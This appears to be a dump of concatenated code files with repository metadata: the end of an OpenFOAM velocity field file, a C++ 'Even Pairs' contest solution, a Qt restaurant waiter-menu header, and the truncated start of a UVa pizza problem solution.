(0.0341819472453 0.492581341058 0)
(0.0364256739992 0.490850450361 0)
(0.0389111564821 0.489192399097 0)
(0.0416376121379 0.48749615745 0)
(0.0446097215298 0.485652397529 0)
(0.0478334930678 0.483542946063 0)
(0.0513356384902 0.481021060796 0)
(0.0550967490839 0.477906270212 0)
(0.0592005876843 0.473936465405 0)
(0.0635102095644 0.46873700479 0)
(0.0681249122743 0.461801774158 0)
(0.0730523914522 0.451966641617 0)
(0.077101281302 0.437918259693 0)
(0.0826994055662 0.412835421284 0)
(0.0811860226064 0.314526717346 3.06985838809e-30)
(0.0569264170009 0.191099737574 0)
(0.015911812824 0.0708087288362 0)
(-0.0007001684794 -0.00153875861203 0)
(-1.57230845103e-05 -0.00222624621773 0)
(-0.000578666675735 -0.00208787658878 0)
(-0.000812888345258 -0.00190876540186 0)
(-0.000928012977912 -0.00170294950246 0)
(-0.00096881937458 -0.00156079567581 0)
(-0.000952163295121 -0.00147575211855 0)
(-0.000893456802607 -0.00141048943391 0)
(-0.000813274105016 -0.00136265296669 -1.76155768719e-30)
(-0.000718299254475 -0.00132679391858 0)
(-0.000614810981823 -0.00130401507309 0)
(-0.000515171929196 -0.00131342282998 -2.228596269e-30)
(-0.000411159677594 -0.00132039498094 0)
(-0.000312312341332 -0.00133193686404 0)
(-0.000222154370327 -0.00134242643125 0)
(-0.00013331171712 -0.00135037554565 0)
(-4.08443868508e-05 -0.00130509432469 0)
(3.10356900001e-05 -0.00112574245197 0)
(0.000313830286431 -0.0018555224924 0)
(0.00125033563765 -0.00286716698211 -6.40897664073e-29)
(0.00104572074493 -0.00153763322458 0)
(0.00119195189419 -0.00118588866189 0)
(0.00132232121213 -0.00128734681194 0)
(0.00156208236157 -0.00163831648569 0)
(0.00179503803606 -0.00189112643573 0)
(0.0018627610196 -0.00190121408999 0)
(0.00281525701142 -0.00291635985592 0)
(0.00425045295623 -0.00497096587872 -4.79459828729e-29)
(0.00450567540002 -0.00639356021547 0)
(0.00344089550559 -0.00623819538257 0)
(0.00164481826109 -0.00395971382128 0)
(0.00112338084018 -0.0024074243094 0)
(0.00129237001931 -0.0020130428174 0)
(0.00146475215837 -0.00198253993388 0)
(0.00156118870083 -0.00211133872279 0)
(0.00147262827832 -0.0022635891819 0)
(0.00113360328772 -0.00231402014362 0)
(0.000681549052064 -0.00201197144471 0)
(0.000435445698786 -0.00145898366029 0)
(0.000421040983504 -0.00104607945172 0)
(0.000478890769224 -0.000796751977959 0)
(0.000552080191802 -0.00060958503309 0)
(0.000637816175105 -0.000444861464507 0)
(0.000730134627579 -0.000295332832787 0)
(0.000828374701295 -0.000166379234003 0)
(0.000926645764816 -5.60826204708e-05 -3.70883316025e-30)
(0.00102590066163 5.16826554378e-05 0)
(0.00115315389585 0.000175022651777 0)
(0.00128123977785 0.000300831330242 0)
(0.00140825132662 0.000426265691412 0)
(0.00165500537079 0.000569413458169 0)
(0.00191941667478 0.000678065044469 0)
(0.00222372575343 0.000751180775174 0)
(0.00276428531449 0.000746920143027 0)
(0.00153592378104 0.000615278630698 0)
(0.0151768941912 -0.00745085771779 0)
(0.000907187482467 -0.000976044059027 0)
(0.0187924096682 0.448900754433 0)
(0.0236154930015 0.501248291271 0)
(0.0256154261578 0.503926693868 0)
(0.0264024397285 0.500918291561 0)
(0.0276597610428 0.498297113494 0)
(0.0291062816005 0.496242339498 0)
(0.0308104095315 0.494561685485 0)
(0.0327704427568 0.493079340632 0)
(0.0349770460113 0.49166836279 0)
(0.0374377910839 0.490224720416 0)
(0.0401646544097 0.488645632973 0)
(0.0431735323637 0.486818106126 0)
(0.0465001100838 0.484598763841 0)
(0.050143647405 0.48180777321 0)
(0.0542130061632 0.478168886238 0)
(0.0585598921725 0.473303038958 0)
(0.0634299110969 0.466630500892 0)
(0.0686387208514 0.456875963679 0)
(0.0732149064056 0.442677958751 0)
(0.0798277650946 0.415953534689 0)
(0.0783964007744 0.299074801426 -3.23034739414e-30)
(0.0486510740329 0.162039162976 0)
(0.00981829865525 0.0374077922321 0)
(-0.000877132265251 -0.00324737217914 0)
(-0.000532379681326 -0.00271920467405 0)
(-0.000870785440412 -0.0023858254334 0)
(-0.00106845514742 -0.00207761664726 0)
(-0.00118065976773 -0.00179323294528 0)
(-0.00119042734705 -0.00154665860042 0)
(-0.00117456107417 -0.00141884006036 0)
(-0.00109489345764 -0.00132499415924 0)
(-0.000992057940872 -0.00126210494231 0)
(-0.00087444021288 -0.0012207152652 0)
(-0.000749408857712 -0.0011941317317 0)
(-0.000623287263408 -0.00118685371716 2.30766325633e-30)
(-0.000496584501381 -0.00119293764689 0)
(-0.000375435813745 -0.00122115520034 0)
(-0.000266730643191 -0.00125149224526 0)
(-0.000158270747126 -0.00124125811509 0)
(-4.92974100065e-05 -0.00121459819013 0)
(-1.21577294377e-05 -0.00113632103675 0)
(0.000127508667331 -0.00147724659899 0)
(0.000754905410145 -0.00220535491842 5.8516096259e-29)
(0.000874887232897 -0.00152303408767 0)
(0.000794428977057 -0.000885301294479 0)
(0.000914441467154 -0.000903514567136 0)
(0.00110096571594 -0.00106961262111 0)
(0.00160790418276 -0.00152233374715 0)
(0.00220551094816 -0.0020891153607 0)
(0.00294713043712 -0.0028190371826 0)
(0.00445732687781 -0.00453767954931 5.31289644355e-29)
(0.00549844671666 -0.00653049658857 0)
(0.00505280140552 -0.00757946254482 0)
(0.00320424880789 -0.00626607221848 0)
(0.00149577556259 -0.00260643694023 0)
(0.00161858528541 -0.0018614601957 0)
(0.00176903524131 -0.00174122386339 0)
(0.00186279455313 -0.00185842164484 0)
(0.00194791834551 -0.0022691292103 0)
(0.00152033679526 -0.00247689903425 0)
(0.000662409277507 -0.0022327029781 1.4314422365e-28)
(0.000259945440822 -0.0014599683172 -1.11590697541e-28)
(0.000333604563017 -0.00100600854296 0)
(0.000434497428547 -0.000737623066672 -9.09352988721e-30)
(0.00051339003858 -0.000533866155117 0)
(0.000597699694418 -0.000356643676138 0)
(0.0006854782473 -0.000198863176869 0)
(0.000777432186618 -6.81832017402e-05 0)
(0.000869723920643 3.93370215172e-05 3.93834873483e-30)
(0.000962624855908 0.000148591035034 0)
(0.00105495170411 0.000283245082155 0)
(0.00113727661119 0.000421594303872 0)
(0.00128602420776 0.000606375959064 0)
(0.00149960918163 0.000807972184963 0)
(0.00180072427865 0.000984375990526 0)
(0.00214826998673 0.00112739036476 0)
(0.0027051396431 0.0012291362522 0)
(0.00199410171216 0.0013929575196 0)
(0.0109206093111 -0.000143815637055 0)
(0.00131671882299 -0.0020431071146 0)
(0.0159752227272 0.460759278119 0)
(0.0209190824468 0.504717647512 0)
(0.0229552724202 0.505260675517 0)
(0.0235941513908 0.501996089414 0)
(0.0245941329475 0.499526589228 0)
(0.0257797790691 0.497698287621 0)
(0.0271908660362 0.496255622008 0)
(0.0288538588334 0.495019448164 0)
(0.0307661865506 0.493862799012 0)
(0.032940182684 0.492686306779 0)
(0.0353936273935 0.491394375218 0)
(0.038151747522 0.489881587186 0)
(0.0412593143849 0.488012298468 0)
(0.0447397580602 0.485611306839 0)
(0.0487221565471 0.482397369268 0)
(0.0530738784888 0.477997098477 0)
(0.0582080606437 0.471747182885 0)
(0.0636915676124 0.462312937748 0)
(0.0690146306535 0.448225984156 0)
(0.0767963857388 0.41984818567 0)
(0.0749960713723 0.279716850026 0)
(0.0371623254774 0.127154320147 0)
(-6.97130107313e-05 5.07253599201e-05 0)
(-0.000832453038629 -0.00326197478571 0)
(-0.000904324938746 -0.00300131372727 0)
(-0.00122034667723 -0.00262522847361 0)
(-0.00140554224996 -0.00222002498235 9.34047139912e-31)
(-0.00149063366215 -0.00185220689812 0)
(-0.00146557808733 -0.00153237605995 0)
(-0.00142424604379 -0.00134067838189 0)
(-0.00132325491187 -0.00121629223477 0)
(-0.00119637436699 -0.00113833128919 0)
(-0.00105564341481 -0.00109042840903 0)
(-0.000904657098712 -0.00106133369556 0)
(-0.000755045618671 -0.00105702265836 0)
(-0.000604050520562 -0.00106461884257 0)
(-0.000454189220754 -0.00108328581433 0)
(-0.000328555964747 -0.00114562736495 0)
(-0.000195699078842 -0.00111716406834 0)
(-6.8290708246e-05 -0.0011086084277 0)
(-1.89292757324e-05 -0.0012262873531 0)
(8.44779744286e-05 -0.00117707867194 0)
(0.000507596218058 -0.00173203994438 -5.31703725385e-29)
(0.000826611666983 -0.00154828125697 0)
(0.000695318679804 -0.000727598535036 0)
(0.000955199512215 -0.000807979395345 0)
(0.00123277196072 -0.000999699703528 0)
(0.00156738589702 -0.00120033023294 0)
(0.00197750785866 -0.00141270921548 0)
(0.00248421856203 -0.00175930674587 0)
(0.00327106858608 -0.00270184764259 0)
(0.00553041852297 -0.00581046048122 0)
(0.00603044557022 -0.00807372846379 0)
(0.00482403367533 -0.00810510783091 0)
(0.00187978284117 -0.00291753959339 0)
(0.00172624722671 -0.00155867596491 0)
(0.00223300734882 -0.00154218523523 0)
(0.00266263330706 -0.00182177606762 -1.69752339783e-28)
(0.00292840036362 -0.00254014450192 2.03834671533e-28)
(0.00387209115511 -0.00418848640759 0)
(0.00149431430793 -0.00340942593409 0)
(0.000225395168874 -0.00154672157371 -1.96895169654e-28)
(0.000331597638661 -0.000776262235152 1.10220094503e-28)
(0.000426442429396 -0.000595913085833 1.09633316972e-29)
(0.00048925286169 -0.000436335605529 0)
(0.00057013339141 -0.000263331257287 0)
(0.000654064458611 -0.000106954955874 0)
(0.000738418689836 2.70916758843e-05 0)
(0.000835153750673 0.000127863139416 0)
(0.000906917080908 0.000212039601067 0)
(0.000951885763405 0.000350673970527 0)
(0.000985732817219 0.000516891545088 0)
(0.00112391387892 0.0007715861249 0)
(0.00131811342252 0.00104863168629 0)
(0.00159992537535 0.00129683646492 0)
(0.00197894728074 0.00153547850147 0)
(0.00249857836348 0.0017653327555 0)
(0.00275507969358 0.00199948294201 0)
(0.00499217496921 0.00090546319933 0)
(0.00184715241319 -0.000897958895664 0)
(0.0155609027661 0.471902593015 0)
(0.0187784329249 0.507708316011 0)
(0.0204253226759 0.506290527308 -4.22931637603e-30)
(0.020768248 0.502795318163 0)
(0.0213818189207 0.500447048414 0)
(0.0222414222122 0.498836867271 0)
(0.0233291828916 0.497634304592 0)
(0.0246735634833 0.496648974993 0)
(0.0262708148492 0.495752978016 0)
(0.028131501034 0.494852678562 0)
(0.0302755837624 0.493862616547 0)
(0.0327353956448 0.492689355644 0)
(0.0355643346522 0.491211020177 0)
(0.03881245226 0.489262962348 0)
(0.042621533187 0.486571217993 0)
(0.0469089957107 0.482772165527 0)
(0.0522394841788 0.477122144076 0)
(0.0579174638667 0.468331689506 0)
(0.0643225868087 0.454773831921 0)
(0.0737200833655 0.425175012436 0)
(0.0719259694726 0.256739645224 0)
(0.021769025034 0.0871892835268 0)
(-0.000744677279974 -0.00310818536501 0)
(0.000173688109125 -0.00410470025664 0)
(-0.00117045034975 -0.00354243959102 0)
(-0.00165206344431 -0.0029091681104 0)
(-0.00184146969079 -0.00233428181647 -9.33645713199e-31)
(-0.00186857709196 -0.00186308364226 0)
(-0.00180083973221 -0.00149359403256 9.85539104139e-31)
(-0.00167207796212 -0.00122126659816 0)
(-0.00156226140236 -0.00107874917599 0)
(-0.00140189163855 -0.000985223782141 0)
(-0.0012429784405 -0.000932298174854 0)
(-0.0010691942832 -0.000900209218178 0)
(-0.000902235412859 -0.000897210851682 0)
(-0.000730576835633 -0.000911633232954 0)
(-0.000553147977809 -0.000933021888425 0)
(-0.000406325671883 -0.00100141897392 0)
(-0.000249616609799 -0.000997364436289 0)
(-8.71465668772e-05 -0.000966444740009 0)
(2.69863296594e-05 -0.00101019206812 0)
(6.70468787868e-05 -0.000747025433591 0)
(0.000312167005607 -0.00124594312074 4.6692069471e-29)
(0.000886290240781 -0.0015809183293 0)
(0.000662941740178 -0.000624369244392 0)
(0.000973869576696 -0.000630578126322 0)
(0.00119771757261 -0.000692731632011 0)
(0.00146706504098 -0.00085657700686 0)
(0.00173677119026 -0.00104136148477 0)
(0.00203733488986 -0.00125284284857 0)
(0.0023467613755 -0.00160880779574 0)
(0.00407250334678 -0.0038798975509 0)
(0.00674177637292 -0.00830686866383 0)
(0.00710168279493 -0.00981987995765 0)
(0.0034755696241 -0.00425134469455 0)
(0.00192220842261 -0.00116133691987 0)
(0.00237913522564 -0.000858030985373 0)
(0.00291912976054 -0.00108777403051 0)
(0.0029192668868 -0.00133250047047 0)
(0.00681259348896 -0.00587710297566 0)
(0.00694797714742 -0.0077919099384 0)
(0.00110192009386 -0.00181921627277 0)
(0.000806360242415 -0.000911036807663 0)
(0.000768035034795 -0.000925744099149 0)
(0.000630236300939 -0.000539903712002 0)
(0.000649079258457 -0.000225413995069 0)
(0.000678637607408 -5.10812300242e-05 0)
(0.000728409826473 0.0001277101529 0)
(0.000850227888519 0.000234315871982 0)
(0.00090766316055 0.000220071996239 0)
(0.000869641967479 0.000361763407129 0)
(0.000807859041847 0.000545343880386 0)
(0.000907490440075 0.000909863246119 0)
(0.00107738220661 0.00123189408646 0)
(0.0013071547744 0.00155939280118 0)
(0.00167967173228 0.00194026701385 0)
(0.00224107952462 0.00243143931367 -2.15268545257e-30)
(0.00305882436757 0.00277994140936 0)
(0.00505664543143 0.00253100264977 0)
(0.00278191981664 0.00140219838202 0)
(0.0173841010093 0.481690670136 0)
(0.0176562614562 0.509540281109 0)
(0.0180828839045 0.506527109494 4.24432663042e-30)
(0.0179038806919 0.503047783787 0)
(0.0180050405409 0.500927368949 0)
(0.0184711543828 0.499595923536 0)
(0.0192113153788 0.498668061249 0)
(0.0202221513195 0.497948508686 0)
(0.0214867501925 0.497317305208 0)
(0.0230066643872 0.496693399579 0)
(0.0247994998947 0.496007543547 0)
(0.0269013005472 0.495185090316 0)
(0.0293730053575 0.494126716437 0)
(0.0322908703286 0.492689666128 0)
(0.0358068246263 0.49062572717 0)
(0.0399258155442 0.487581360744 0)
(0.0452822663628 0.48274790928 0)
(0.0509332380151 0.474941329734 0)
(0.0585359965326 0.462157054952 0)
(0.0694244473759 0.431844305189 0)
(0.0685797048617 0.229498559965 0)
(0.0201702831473 0.0501321419858 0)
(-0.00115531877539 -0.00728847175335 0)
(-0.000884526295889 -0.00567755799292 0)
(-0.00210024053599 -0.00425021763945 0)
(-0.00242836537259 -0.00315390357954 0)
(-0.00245160259319 -0.0023533595659 0)
(-0.00233143472048 -0.0017783715397 0)
(-0.0021642997603 -0.00136616829657 -9.85368917353e-31)
(-0.00190776163451 -0.001048119366 0)
(-0.00178922059412 -0.000907172335147 0)
(-0.00159615979263 -0.000808853113177 1.52994136579e-30)
(-0.00142130306877 -0.000755339451823 0)
(-0.0012385433624 -0.000726268828892 0)
(-0.00104348388432 -0.000713163594873 0)
(-0.000865342152385 -0.000732805451342 0)
(-0.000682308914054 -0.00077985380298 0)
(-0.000500640105444 -0.000856193614662 0)
(-0.000274318249123 -0.00083671598708 0)
(-7.53058847025e-05 -0.000745594198577 0)
(0.000136340301436 -0.00117343871584 0)
(0.000287711681062 -0.000972712445386 0)
(0.00051434434881 -0.00106662088969 -5.06971396693e-29)
(0.000674644516525 -0.000934832749822 0)
(0.00059194699968 -0.000556681312722 0)
(0.000830951057954 -0.000404911478674 0)
(0.00109120775438 -0.000413855707164 0)
(0.00133154293801 -0.000634435629349 0)
(0.00146944497209 -0.000852766433206 0)
(0.00154708746835 -0.00104545056515 0)
(0.00160009043532 -0.001163227461 0)
(0.00171932912569 -0.00152882101434 0)
(0.00454390786297 -0.00534923745733 0)
(0.00771105724834 -0.00977271339047 0)
(0.00812218412992 -0.00867258764468 0)
(0.0045447811302 -0.00266458151804 0)
(0.00321846463573 -0.00152863581332 0)
(0.00293288874693 -0.00135469270646 0)
(0.00240017368628 -0.000820816622158 0)
(0.00171565096652 -0.00111327202263 0)
(0.00687104737674 -0.00748197858044 0)
(0.00697218139451 -0.00719407758063 0)
(0.00122169521407 -0.000777814811294 0)
(0.00074344706199 -0.000374725550206 0)
(0.000406189350335 -0.00020508449187 0)
(0.000616089533772 6.0356582012e-06 0)
(0.000688923420438 3.12694729519e-05 0)
(0.000713515535662 0.000167000221166 0)
(0.000919163131789 0.000376454735669 0)
(0.00109908323843 0.000110613781978 0)
(0.000848555388109 0.00022041410537 0)
(0.000662913719012 0.000508396289494 0)
(0.000663972721984 0.000904537243475 0)
(0.000760065199883 0.00157446432478 0)
(0.000856796197437 0.00174175403469 0)
(0.00108961331573 0.00214184111388 0)
(0.0016591702292 0.00297190646603 2.15229806152e-30)
(0.00265702988854 0.00423934244805 0)
(0.00551187276505 0.00580023474291 0)
(0.00399337204131 0.0045369355803 0)
(0.0195474937974 0.489782231048 0)
(0.0170717867499 0.509348285071 0)
(0.0156273602052 0.505474258697 0)
(0.0147496290314 0.502525813976 0)
(0.0143183015254 0.500896762782 0)
(0.0143908604956 0.499963862707 0)
(0.0148016453847 0.499359488361 0)
(0.0154903737105 0.498915559014 0)
(0.0164182952519 0.498539517992 0)
(0.0175745756646 0.498173769913 0)
(0.0189711856004 0.497772113766 0)
(0.0206432392762 0.497285408515 0)
(0.0226546627412 0.496646641604 0)
(0.0251011866455 0.49575283324 0)
(0.0281494623418 0.494414179468 0)
(0.0319307113888 0.49232224797 0)
(0.0370721152569 0.488698369257 0)
(0.0426173359982 0.482431045842 0)
(0.0516038067196 0.470502867488 0)
(0.0626591107245 0.439205572257 0)
(0.0602762891049 0.191514590094 0)
(0.00184687479952 -0.00252070134478 0)
(-0.00111581280894 -0.0109658814631 0)
(-0.00304310062231 -0.00708841845529 0)
(-0.00369411486994 -0.00463630884349 0)
(-0.00354895580422 -0.00310836138586 0)
(-0.00321704017936 -0.00214639018495 0)
(-0.00285579757692 -0.00153028373257 0)
(-0.0025326592784 -0.00112179478613 0)
(-0.00218925640505 -0.000836698424344 0)
(-0.00198621334196 -0.000693666650565 0)
(-0.00177884016059 -0.000613488778703 -1.50348145138e-30)
(-0.00157758488781 -0.000565387414523 0)
(-0.00138248063862 -0.000535131172657 0)
(-0.00118074031672 -0.000527483122173 0)
(-0.000973591816747 -0.000536882574853 0)
(-0.000759103104795 -0.000560200369369 0)
(-0.000532705258187 -0.000594380059154 0)
(-0.000263336748547 -0.00056837632182 0)
(-7.44936362747e-05 -0.000598794790375 0)
(0.000211390061304 -0.000687526032578 0)
(0.000749600875545 -0.000684639292593 0)
(0.000724580729614 -0.000687278340546 -3.72576411124e-29)
(0.00148053068197 -0.00142518607296 0)
(0.000502499101989 -0.000350947618113 0)
(0.000639187819847 -0.000120033648428 0)
(0.00103539425225 -4.87483378807e-05 0)
(0.00134833211643 -0.00039215730073 0)
(0.001400172209 -0.000604204513013 0)
(0.00139600863009 -0.000757402473175 0)
(0.00129348807036 -0.000788280585574 0)
(0.00120029778004 -0.000764353159587 0)
(0.00163623897454 -0.00144924552796 0)
(0.0064735144728 -0.00688243674322 0)
(0.0102413972018 -0.00833175951603 0)
(0.00547243154008 -0.00290890577385 0)
(0.0028194526596 -0.00110307445001 0)
(0.00207900259715 -0.000652317890378 0)
(0.00186943913052 -0.000317404133655 0)
(0.00189013164054 0.000204938481608 0)
(0.0079163800909 -0.002262064984 0)
(0.0124676869093 -0.00388178293397 0)
(0.0162813079931 -0.00439377827395 0)
(0.0189870582416 -0.00272983058845 0)
(0.0205565267541 -0.00179426445125 0)
(0.020052955151 -0.00159163470685 0)
(0.012722383556 -0.00109413503504 0)
(0.0183284613978 -0.00225564417792 0)
(0.00551285164432 -0.000589651411204 0)
(0.00238415684344 -2.99427345387e-05 0)
(0.00298501143198 0.000433080424113 0)
(0.000498456732781 0.000353294552952 0)
(0.000685587417947 0.00106088501351 0)
(0.000265187569921 0.000923153601267 0)
(0.000349657148802 0.00171784960394 0)
(0.000222615016972 0.00161017292643 0)
(0.00033014413183 0.0025562955787 0)
(0.000425766090084 0.00274913953381 0)
(0.00549067986364 0.00455856229313 0)
(0.00605767424816 0.00846190120076 0)
(0.0199668331278 0.494538087816 0)
(0.0157619795617 0.506483255282 0)
(0.0123507231199 0.503167628491 0)
(0.0108327583285 0.501385107545 0)
(0.0100833261359 0.500505940167 0)
(0.00990715360523 0.500043258425 0)
(0.0100773456056 0.499761273631 0)
(0.0104899531387 0.49956245778 0)
(0.0110937201742 0.499398209985 0)
(0.0118711973608 0.499240247654 0)
(0.0128286207313 0.49906689379 0)
(0.0139941642399 0.498855280476 0)
(0.0154229978405 0.498573540997 0)
(0.0172077977536 0.498170026321 0)
(0.019512393175 0.497543837964 0)
(0.0225727302051 0.496508493514 0)
(0.0270007552685 0.494543150202 0)
(0.0325739169072 0.490774218261 0)
(0.0438941845591 0.481458518099 0)
(0.0544586094301 0.453648531468 0)
(0.0423413037336 0.161152384593 0)
(0.00119324499152 -0.00771322645415 0)
(-0.00122232006302 -0.00737123903425 0)
(-0.00721996434174 -0.00809857546898 0)
(-0.00608053500018 -0.00411524048313 0)
(-0.00491855026114 -0.00248753464356 0)
(-0.004029789212 -0.00158240928995 0)
(-0.00335606695375 -0.00106666349849 0)
(-0.00285806867641 -0.000750035855382 0)
(-0.00241786841095 -0.000539088889652 0)
(-0.00214724306686 -0.000434181769935 0)
(-0.00191645122086 -0.000384560272114 0)
(-0.00167276915535 -0.000349951022266 0)
(-0.00145981478774 -0.000323420967415 0)
(-0.0012501347425 -0.00031168197673 0)
(-0.00102950182794 -0.000314475359537 0)
(-0.000808777786272 -0.000329893555259 0)
(-0.000589040902329 -0.000354393670015 0)
(-0.000334389608974 -0.000359873937589 0)
(-0.000126530824575 -0.000456879381006 0)
(0.000396271015948 -0.000281793655447 0)
(0.000520852288645 -0.000105279221271 0)
(0.00103022659179 -0.000313404588811 3.71211161621e-29)
(0.00154183175194 -0.000744821787465 0)
(0.00448454324475 -0.00124392713376 0)
(0.00517260586576 -8.93132647047e-05 0)
(0.00246655546204 0.000147367778146 0)
(0.00407509877703 -0.000319686570579 0)
(0.00440308854446 -0.000662646272404 0)
(0.00596585334142 -0.00115064662175 0)
(0.0073423083877 -0.0014587589073 0)
(0.0084306783493 -0.00141656482021 0)
(0.00919175454397 -0.00123517497993 0)
(0.0112628411387 -0.00293026621693 0)
(0.0169888690761 -0.00548630783779 0)
(0.0230270794426 -0.00693755082661 0)
(0.0282985948616 -0.00643315523476 0)
(0.0317405157725 -0.00479186182555 0)
(0.0333949848289 -0.00299902656392 0)
(0.0334533869739 -0.0010025093468 0)
(0.0326579691295 -7.6562004008e-05 0)
(0.0324579921891 0.000278714242407 0)
(0.0334179376222 0.00058272598513 0)
(0.0342265680322 0.000934465824136 0)
(0.0348929369051 0.000677703021164 0)
(0.0361779944017 -0.000417435538621 0)
(0.038140128595 -0.00124213195086 0)
(0.0412554738255 -0.0025186686954 0)
(0.0448904820428 -0.00540284058537 0)
(0.0492939764471 -0.00476382659638 0)
(0.0514670336494 -0.00347434769705 0)
(0.0519950930575 -0.00201643023964 0)
(0.0516981811374 -0.000225661628813 0)
(0.0505238814067 0.00124547018173 0)
(0.0487922779672 0.00251713744116 0)
(0.0465965171342 0.00351196659581 0)
(0.043730011211 0.00517738106228 0)
(0.0389907545947 0.00827015226026 0)
(0.037159025207 0.0188859280071 0)
(0.00418634712486 0.00572255924962 0)
(0.0153235117289 0.495051175333 0)
(0.011010871188 0.502142866484 0)
(0.00717358612323 0.500875200015 0)
(0.00577733517941 0.500357282243 0)
(0.0052064649521 0.500128873242 0)
(0.00504062524063 0.500016018562 0)
(0.00509347762893 0.499949787266 0)
(0.00528603452922 0.499904080913 0)
(0.00558344996507 0.499866761031 0)
(0.00597369505654 0.49983104378 0)
(0.00645932909434 0.499791845384 0)
(0.00705585226271 0.499743813351 0)
(0.00779475689407 0.499679385079 0)
(0.00873194403474 0.499585923314 0)
(0.00996998578227 0.499437642509 0)
(0.0116958284692 0.499182542024 0)
(0.0143614421627 0.498660081252 0)
(0.0187030762366 0.49754153371 0)
(0.0295894643417 0.493973629138 0)
(0.0369078015563 0.482511215439 0)
(0.0163138218237 0.182930559658 0)
(-0.0102740755899 -0.00551118233509 0)
(-0.0545167091843 -0.0265424897701 0)
(-0.00631255716319 -0.00424392926424 0)
(-0.00929924011565 -0.00176463337874 0)
(-0.00607486376931 -0.000995730734142 0)
(-0.00463227577173 -0.000597218033654 0)
(-0.00368357281383 -0.000387590387014 0)
(-0.00305648244562 -0.000265216393886 0)
(-0.00254996317745 -0.000185505860027 0)
(-0.00225936913183 -0.000147240646878 0)
(-0.00202890634561 -0.000132471356693 0)
(-0.00176030462516 -0.00012106688285 0)
(-0.00153252616693 -0.000110060839735 0)
(-0.00132537268656 -0.000104310034781 0)
(-0.0011184901382 -0.000107003231324 0)
(-0.000903458946721 -0.000116199989103 0)
(-0.000678159770998 -0.000124490226079 0)
(-0.000405590127195 -0.000119281383853 0)
(-0.000201816278239 -0.00018366235724 0)
)
;
boundaryField
{
frontAndBack
{
type empty;
}
upperWall
{
type noSlip;
}
lowerWall
{
type noSlip;
}
inlet
{
type fixedValue;
value uniform (0 0.5 0);
}
outlet
{
type inletOutlet;
inletValue uniform (0 0 0);
value nonuniform List<vector>
20
(
(0.341081119188 -0.353394920304 0)
(0.466256363441 -0.294766796226 0)
(0.542749955455 -0.223341323135 0)
(0.587215048654 -0.157863879923 0)
(0.610991420161 -0.0965946291354 0)
(0.620803572649 -0.0405428349668 0)
(0.618445562137 0.0147997450032 0)
(0.608036675001 0.059087983537 0)
(0.594497746787 0.0984669085513 0)
(0.578233232311 0.132975054335 0)
(0.559454010172 0.163669594115 0)
(0.538176846744 0.191025226707 0)
(0.514308780706 0.215450587885 0)
(0.487652503803 0.23730102285 0)
(0.457869458549 0.256948946814 0)
(0.424342983744 0.2747341093 0)
(0.385754092065 0.290896827452 0)
(0.339320720396 0.306328660568 0)
(0.280717205061 0.323274926184 0)
(0.203313794897 0.332611379011 0)
)
;
}
}
// ************************************************************************* //
|
|
52d1391ce0460ed046b008e73bfc08e6f8876104
|
f78bfa30ec1c4edac74b06f38637c5ea9a069a81
|
/week01/Even Pairs/even_pairs.cpp
|
472d91d196819f9dc34b6488e53ccfdf216eb74b
|
[] |
no_license
|
PatrikOkanovic/ETH-AlgoLab-2020
|
09de6ac11493ed7daad945213bcc73fa3002b25d
|
02d656bacfa3e559dd9b7d8b8758be246d8411f6
|
refs/heads/main
| 2023-03-08T04:36:57.508493
| 2021-02-25T15:32:47
| 2021-02-25T15:32:47
| 342,080,113
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 491
|
cpp
|
even_pairs.cpp
|
#include <iostream>
using namespace std;
void test_case() {
int n; cin >> n;
int even = 0, odd = 0, sum = 0;
for (int i = 0; i < n; i++) {
int xi; cin >> xi;
sum += xi;
if (sum % 2 == 0) even++;
else odd ++;
}
cout << even * (even - 1) / 2 + odd * (odd - 1) / 2 + even << "\n";
}
int main() {
ios_base::sync_with_stdio(false);
int t; cin >> t;
for (int i = 0; i < t; i++) {
test_case();
}
return 0;
}
|
03e9ca55e187ecfb597c0137ceae0d66a2aec0c4
|
e8f94f7e43490b3867fa98726e510f59ab6b8328
|
/mesero_menu.h
|
ce1f75a0a0747bdfb77df1ebf264981fdfea42df
|
[] |
no_license
|
DanielPerMon/proyectoSaboreno
|
07127d756e5b1c6f37f5aeeb914ad4102576be38
|
798fb6ab29b1c4b4da34da76f8c85a068813356e
|
refs/heads/master
| 2023-03-24T03:50:56.273771
| 2021-03-19T13:00:33
| 2021-03-19T13:00:33
| 333,259,706
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,518
|
h
|
mesero_menu.h
|
#ifndef MESERO_MENU_H
#define MESERO_MENU_H
#include <QDialog>
#include <QtSql/QtSql>
#include <QtSql/QSqlDatabase>
#include <QtSql/QSqlQuery>
#include <QDebug>
#include <QMessageBox>
#include <QWidget>
namespace Ui {
class mesero_menu;
}
class mesero_menu : public QDialog
{
Q_OBJECT
public:
explicit mesero_menu(QSqlDatabase, QString, QWidget *parent = nullptr);
~mesero_menu();
private slots:
void on_salir_clicked();
void on_verMesas_pushButton_clicked();
void on_mesa1_clicked();
void on_mesa2_clicked();
void on_mesa3_clicked();
void on_mesa4_clicked();
void on_mesa5_clicked();
void on_mesa6_clicked();
void on_mesa7_clicked();
void on_mesa8_clicked();
void on_mesa9_clicked();
void on_menu_Platillos_tabBarClicked(int index);
void handleItem();
void on_agregarord_pushButton_clicked();
void on_btnmenos_clicked();
void on_btnmas_clicked();
void on_orden_tabBarClicked(int index);
void on_enviarord_pushButton_clicked();
void borrarItem();
void on_pagarord_pushButton_clicked();
private:
Ui::mesero_menu *ui;
QSqlDatabase baseMesero;
void cargarMesas();
void agregarProducto(QString);
void cargarOrden(QString);
QList<QPushButton *> botones;
QList<QString> listaProductos;
QList<int> aux;
QString temporal;
int numeroCuenta;
int idMesero;
int filaactual;
int filafinal;
QString mesa;
int platillosNuevos;
};
#endif // MESERO_MENU_H
|
83569dbb948b986d1904f844c098ffdde0625b03
|
e8a3c0b3722cacdb99e15693bff0a4333b7ccf16
|
/Uva Oj/I love pizza..12626.cpp
|
0af2088f08fe75d9756e3caf6d6ee26772e4cdf6
|
[] |
no_license
|
piyush1146115/Competitive-Programming
|
690f57acd374892791b16a08e14a686a225f73fa
|
66c975e0433f30539d826a4c2aa92970570b87bf
|
refs/heads/master
| 2023-08-18T03:04:24.680817
| 2023-08-12T19:15:51
| 2023-08-12T19:15:51
| 211,923,913
| 5
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 803
|
cpp
|
I love pizza..12626.cpp
|
#include<iostream>
#include<cstdio>
#include<algorithm>
#include<cstring>
using namespace std;
int main()
{
int a, b, c, i, j, k, l, n;
char str[650];
int ara[30], ara2[6];
scanf("%d",&n);
